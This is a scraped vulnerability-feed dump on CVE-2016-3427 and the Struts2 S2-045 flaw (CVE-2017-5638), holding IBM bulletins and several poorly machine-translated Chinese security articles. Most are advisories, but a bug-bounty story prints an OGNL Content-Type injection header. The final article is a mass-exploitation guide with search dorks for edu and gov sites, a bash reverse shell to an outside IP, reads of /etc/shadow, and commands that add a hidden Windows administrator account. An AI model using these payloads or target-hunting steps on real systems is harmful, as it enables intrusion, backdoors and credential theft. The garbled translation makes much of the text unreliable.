"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:04", "id": "CE0E774D280D0A9EA8834062B059FA20181F271D6A07DE4FB444EC479DE07233", "href": "https://www.ibm.com/support/pages/node/282281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:09", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Records Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin \"[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>)\" for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Records Manager 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \nIBM Records Manager 8.5.0.6| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \nIBM Records Manager 8.5.0.7| IBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:15:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Records Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:15:34", "id": "342276C20A5C5FDDDF8726F4B0773A53244224965A0AE1BE83CE2A30F753D938", "href": "https://www.ibm.com/support/pages/node/278705", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:16", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Runtime Environments (JREs), Versions 6, 7, 7R1 shipped with IBM WebSphere Application Server patterns. These issues were disclosed as part of the IBM Java SDK updates in April 2016. \n\n## Vulnerability Details\n\nIf you run your own Java code using the IBM Java Runtime delivered with this product, you should evaluate your code to determine whether the complete list of vulnerabilities are applicable to your code. For a complete list of vulnerabilities, please refer to the Reference section for more information. \n \n \nPlease also consult the security bulletin: \n[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) \nfor vulnerability details and information about fixes. \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nIBM Java SDK shipped with IBM WebSphere Application Server Patterns 1.0.0.0,1.0.0.1, 1.0.0.2,1.0.0.3,1.0.0.4, 1.0.0.5, 1.0.0.7,1.0.1.0,1.0.2.0 and 2.2.0.0\n\n## Remediation/Fixes\n\n**_IBM WebSphere Application Server Patterns 1.0.0.0_**\n\nApply WebSphere Application Server fixpack 8.5.5.10 when available, in the interim apply[](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+MQ&release=8.0&platform=All&function=aparId&apars=IT13492>) [](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Application+Server+Patterns&fixids=1.0.0.0-WS-WASPATTERNS-8559&source=SAR>)[ifix 1.0.0.0-WS-WASPATTERNS-APR16](<http://www-933.ibm.com/support/fixcentral/swg/selectFix?product=ibm%2FWebSphere%2FWebSphere+Application+Server+Patterns&fixids=1.0.0.0-WS-WASPATTERNS-APR16&source=SAR&function=fixId&parent=ibm/WebSphere>)\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities have been identified in IBM Java SDK affecting WebSphere Application Server bundled with IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:36", "id": "3DF5A1EC8EEA23B1128F84C6374971EA3815E1F8281F849F3593423BB347D925", "href": "https://www.ibm.com/support/pages/node/278675", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:39:17", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7 that is used by IBM Control Center. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Control Center 6.1.0.0 through 6.1.0.0 iFix02 \nIBM Control Center 6.0.0.0 through 6.0.0.1 iFix05 \nIBM Sterling Control Center 5.4.2 through 5.4.2.1 iFix08\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **Fix**| **How to acquire fix** \n---|---|---|--- \nControl Center| 6.1.0.0| iFix03| [_Fix Central - 6.1.0.0_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.1.0.0&platform=All&function=all>) \nControl Center| 6.0.0.1| iFix06| [_Fix Central - 6.0.0.1_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.0.0.1&platform=All&function=all>) \nControl Center| 5.4.2.1| iFix09| [_Fix Central - 5.4.2.1_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=5.4.2.1&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-12-17T22:47:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Sterling Control Center (CVE-2016-3427 and CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2019-12-17T22:47:42", "id": "5F3A2E75CBD34F2D760C7DAE0148B354CA04A0288478AD25F8ED498DB635196E", "href": "https://www.ibm.com/support/pages/node/283459", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-03-16T03:17:43", "description": "Author: janes(know Chong Yu 404 laboratory)\n\nDate: 2017-03-15\n\n## Background description\n\nStruts2 official to GMT 2017 3 December 6, 10pm published Struts2 there is a remote code execution vulnerability vulnerability number S2-045, CVE number: CVE-2017-5638, and rated as high-risk vulnerabilities. Because the vulnerability affects a wide range of\uff08Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10, the vulnerability degree of harm is severe, you can directly access the application system of the server where the control limit, and 3 on 7 May in the morning on the Internet on the outflow of the vulnerability of the PoC and Exp,so, S2-045 vulnerability in the Internet on the impact of rapid expansion, by the Internet companies and the government attach great importance. From vulnerability announcement to now(3.6-3.15)has been more than a week, so take this opportunity to analyze S2-045 in the social media Twitter and on Sina Weibo heat distribution.\n\n## Data acquisition\n\nIf you want to analyze Twitter and on Sina Weibo, S2-045 vulnerability of the heat distribution, then you need to get Twiiter and Facebook on the data, with the data speak. So they use\u201cselenium+phantomjs\u201dgo crawling the data via Twitter and Sina Weibo web page to the search interface, respectively, search for the keyword\u201cs2-045\u201dand\u201cCVE-2017-5638\u201d, then the search results go to the weight and finishing, taking to Twitter and Facebook, the time display of the time zone inconsistencies, using the same crawl page timestamp and then converted to the local time of the way of a unified time zone issues, the crawling data in the time to 2017 year 3 month 14 days afternoon 18 when, the results as shown below.\n\n* Twitter! [](/Article/UploadPic/2017-3/2017316104811455. png)\n\n* Sina Weibo! [](/Article/UploadPic/2017-3/2017316104812512. png)\n\n## Heat analysis\n\nStatistics daily S2-045 vulnerability in the Twitter and on Sina Weibo, the number of occurrences, to obtain the following table, Twitter, the CCP appears 73 times, Sina Weibo, the CCP appears 45 times. On the dissemination of the amount of data, S2-045 vulnerability of the data amount is not large, this reflected from the side of the security vulnerabilities of the information and not by the majority of the people of concern, mainly in the security circle propagation.\n\n| Social media | 3 December 7 | 3 8 March | 3 April 9 | 3 October 10 | 3 11 March | 3 November 12 | 3 13 February | 3 March 14 \n---|---|---|---|---|---|---|---|--- \nTwitter| 16 | 3 | 7 | 15 | 6 | 11 | 15 | 0 \nSina Weibo| 23 | 8 | 7 | 3 | 0 | 0 | 1 | 3 \n\n! [](/Article/UploadPic/2017-3/2017316104812815. png)\n\nUsing the above table of data, production of graphics, get as on the heat distribution from the figure it can be seen:\n\n* 3 month 6 day before the announcement of the S2-045 vulnerability, 3 on 7, on Twitter and on Sina Weibo, the occurrence of the outbreak spread, which is likely to and vulnerabilities of the PoC and Exp in 3 month 7 days you on the Internet widely spread about;\n* Sina Weibo, S2-045 vulnerability to the heat distribution of the overall downward state, in the peak in 3 month 7 days, while Twitter as a whole was undulating trend, 3 on 7th, 3 on 10th and 3 on 13 September are peak;\n* Sina Weibo and Twitter for both the overall potential is not the same, and in 3 on the 7th, Sina Weibo and Twitter are data of the highest peak, but Sina Weibo, the amount of data than Twitter.\n\nThere may be several reasons could explain this phenomenon:\n\n* S2-045 vulnerability is the Chinese found that, 3 on 6 September evening, the official publication of the vulnerability, 3 on 7 on the morning of the vulnerabilities of the PoC and Exp in domestic Internet flow out, by domestic security company-wide attention, this also would explain the 3 on 7 The New Wave of microblogging amount of data over the Twitter phenomenon;\n* Due to the S2-045 vulnerability to serious harm, and quickly spread out of PoC and Exp, and therefore, 3 on 7 August, the domestic security companies will quickly start the emergency response, other Internet companies also in self-examination and patch S2-045 vulnerability, with the vulnerability of repair, on Sina Weibo, the attention naturally reduces, the overall will show a downward trend;\n* Twitter user distribution of a wide range of countries or regions affected by the S2-045 the influence is different, therefore trends appear UPS and downs.\n\n3 December 7, Sina Weibo and Twitter are data peak, then the 3 on 7, data, time period distribution mapping as follows, As can be seen, the morning 8 When before, Sina Weibo and Twitter, the amount of data is 0, 8 to 10 period rooms began to appear, it seems, and working hours more in line with the, The and the data the peak occurred mainly in the afternoon 14 to 18 between, perhaps this is because PoC and Exp on the Internet widely spread, caused the Internet began to be mass attack(reference [HackerNews Struts2 vulnerability disclosure 24 hour](<http://hackernews.cc/archives/7371>)) to.\n\n! [](/Article/UploadPic/2017-3/2017316104812327. png)\n\nFinally, look at Twitter and Sina Weibo on on S2-045 vulnerability in the first message what time and by whom issued, and the results are shown in the following table. Twitter and Sina microblogging issued the first message is not the same person, but the transmission time difference is not much, visible at home and abroad to exploit the perceptual capacity is relatively quite.\n\nIbid., the times are Beijing time, according to the unix time stamp conversion.\n\nSocial media | time | nickname | real identity\n---|---|---|--- \nTwitter | 2017-03-07 09:29:00 | @amannk | \nSina Weibo | 2017-03-07 09:44:29 | gnaw0725 | nsfocus Brand Manager Wang Yang\n\n**[1] [[2]](<84379_2.htm>) [next](<84379_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "myhack58", "title": "The Struts S2-045 vulnerability heat analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "MYHACK58:62201784379", "href": "http://www.myhack58.com/Article/html/3/62/2017/84379.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the national information security vulnerabilities library CNNVD received on the Apache Struts2 \uff08S2-045 remote code execution vulnerability CNNVD-201703-152 the case of the message send. Because the vulnerability affects a wide range of hazard level high, the national information security vulnerabilities library CNNVD for the tracking analysis, the situation is as follows: \nA, vulnerability introduction\nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework, mainly to provide two versions of the frame product: Struts 1 and Struts 2 of. \nApacheStruts 2.3.5 \u2013 2.3. 31 version and 2. 5 \u2013 2.5.10 version there is a remote code execution vulnerability CNNVD-201703-152, CVE-2017-5638 it. The vulnerability is due to the upload functionality of the exception handling function does not properly handle user input error information. Lead to a remote attacker by sending malicious packets that exploit the vulnerability in the affected on the server execute arbitrary commands. \nSecond, the vulnerability to hazards\nAn attacker can send malformed HTTP packet to exploit the vulnerability in the affected server to perform system commands, and further can completely control the server, causing a denial of service, data leakage, website creation tampering and other effects. Since the exploit without any pre-conditions such as open dmi, debug, and other functions, and enable any plugins, and therefore vulnerability to harm is more serious. \nThird, the repair measures\nCurrently, the Apache official has been directed to the vulnerabilities released a security announcement. Please the affected users to check whether or not affected by the vulnerability. \nSelf-examination manner\n\u7528\u6237 \u53ef \u67e5\u770b web \u76ee\u5f55 \u4e0b /WEB-INF/lib/ \u76ee\u5f55 \u4e0b \u7684 struts-core.x.x.jar file, if the version in Struts2. 3. 5 to Struts2. 3. 31 and Struts2. 5 to Struts2. 5. 10 between the presence of vulnerabilities. \nUpgrade repair\nAffected users can upgrade to version to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary relief\nAs the user inconvenient to upgrade, may take the following temporary solution: \nl delete commons-fileupload-x. x. x. the jar file will cause the upload function is not available. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About Apache Struts2\uff08S2-045\uff09vulnerability briefings-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-07T13:16:58", "description": "I always believe to share with people is a good trait, and I'm also from the vulnerability reward in the field of multi-bit security research experts learned a lot to make me last a lifetime things, so I decided in this article to share with you some of my recent little discovery, hope these things can help you Freebuf of friends early on their own vulnerability reward trip. \n! [](/Article/UploadPic/2017-6/201767192643555. png? www. myhack58. com) \nJust a few months ago, a security research expert in Apache Struts2, found a serious security vulnerability, CVE-2017-5638, probably some of you have heard of this thing. This is a remote code execution vulnerability, then Internet in a large number of Web applications are affected by this vulnerability. About three weeks later, researchers released the Struts2 exploit code. \nIn a dig before the Investigative process, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is Yahoo the a login page. \n! [](/Article/UploadPic/2017-6/201767192643648. png? www. myhack58. com) \nI have tried in this page find the vulnerability, but unfortunately I didn't find until I found the following nodes: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: If you find a node address contains. action,. do or. go, then, this indicates that this Web application to run a Struts2 to. \nAs I said before, for the Struts2 vulnerability exploit code has been released, and this vulnerability using the process is also very simple. Although I know here there is vulnerability, but ready-made exploit code here does not work, so I feel may be a Web application firewall in the mischief, or that some of the things shield my attack. \nSince I was able to determine where there is indeed a vulnerability, so I couldn't stop. But if you want to submit a valid vulnerability, I have to provide a viable PoC to prove this vulnerability is valuable. After a period of research, I found an article tweet this article tweet describes how to pass a Payload to bypass the WAF and be successfully exploited this vulnerability. \nI the use of detection methods require the use of Content-Type HTTP header to send a specially crafted data packet, the header data as shown below: \nContent-Type:%{#context[\u2018com. opensymphony. xwork2. dispatcher. HttpServletResponse\u2019]. addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}. multipart/form-data \nThis specially constructed request can not only make[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)to calculate the two multiplied by the number, and you can also request a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)for any other form of operation. In the above example, the request to calculate the value of 4 * 4, the server returns the result of 16, which means that this server is the presence of security vulnerabilities. \nAs shown in the following figure, the response data will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n! [](/Article/UploadPic/2017-6/201767192643394. png? www. myhack58. com) \nThese have enough I'm through HackerOne to Yahoo to submit a vulnerability report, Yahoo skilled in the art after receiving the report within 30 minutes of the vulnerabilities were classified, and then promptly will be the presence of vulnerabilities the application offline to fix this issue, a few days later I received a Yahoo to provide me with the 5500 knife vulnerability bonus. \nIn fact, digging a hole is not difficult, as long as you are willing to spend time, willing to move the brain to think, I believe thousands of dollars of vulnerability bonuses to everyone or can be easily in the bag. Finally, I hope my these little can be found to everyone in the burrow in the process bring some inspiration. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Burrow experience | to see how I find the Yahoo remote code execution vulnerability and get the 5500 knife bonus-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-08T11:52:28", "description": "1.1 CVE-2017-5638 vulnerability profile\nApache Struts 2 is the world's most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10 \nVulnerability ID: CVE-2017-5638 \nVulnerability rating: HIGH \nVulnerability name: S2-045: Struts 2 remote code execution vulnerability\nVulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE \nAffected version: Struts 2.3.5-Struts 2.3.31 \nThe Struts 2.5-Struts 2.5.10 \nRepair solutions: \nUpgrade to Struts2. 3. 32 or the Struts 2.5.10.1 \nStruts2. 3. 32 download address: \nhttps://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 \nStruts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 \nThe vulnerability principle: Struts2 default parse the uploaded file's Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code. \n1.2 hazard assessment\nAfter the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night. \n1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work\n1\uff0e Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download. \n2\uff0e Ready to have a separate IP of the server, \u5728\u4e0a\u9762\u6709nc.exe the. \n3\uff0e Prepare python environment. \nGeneral use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the \u7136\u540e \u5230 \u8be5 \u76ee\u5f55 \u6267\u884c pythonsetup.py install, to install. Note that in python if you do not set system variables, you'll need to strip the full path to execute. For example: \nC:\\Python27\\python.exeC:\\Python27\\poster-0.8.1\\setup.py install \n! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com) \nFigure 1 The Missing poster. the encode module \n4\uff0e Get a variety of action page \n\uff081\uff09by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like. \n\uff082\uff09Baidu aunt law\ninurl:index. actionsite:edu. cn \ninurl:index. actionsite:gov. cn \ninurl:index. actionsite:com. cn \nNote: don't vandalize, and now the network security method very good it!!! \n1.3.2 modify the poc exploit code\n1. For the linux version of the modified whoami values: bash-i&gt;&amp; /dev/tcp/122.115.47.39/4433 0&gt;&amp;1 \nDescription of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the \u7136\u540e \u5c06 \u6587\u4ef6 \u4fdd\u5b58 \u4e3a poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name. \n! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com) \nFigure 2 modify the linux poc exploit code\n2. Corresponding Windows Server, modify the whomai value: \nnet user antian365$ Wsantian365!*/ add \nnet localgroup administratorsantian365$ /add \n\u5206\u522b \u5c06 poc \u6587\u4ef6 \u4fdd\u5b58 \u4e3a pocwin1.py and pocwin2.py as shown in Figure 3. \n! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com) \nFigure 3 modify the windows under the use of the code\n1.3.3 under Windows fast implement penetration\n1. Each other to open up 3389 \n\uff081\uff09scanning each other whether to open the 3389, open a, respectively, to execute: \npocwin1.py http://www.myhack58.com/index.action \npocwin2.py http://www.myhack58.com/index.action \nIf the other loopholes, then it will directly add a user\u201cantian365$\u201d, password\u201cWsantian365!*\u201d, the Server to open the 3389, sign up and then download 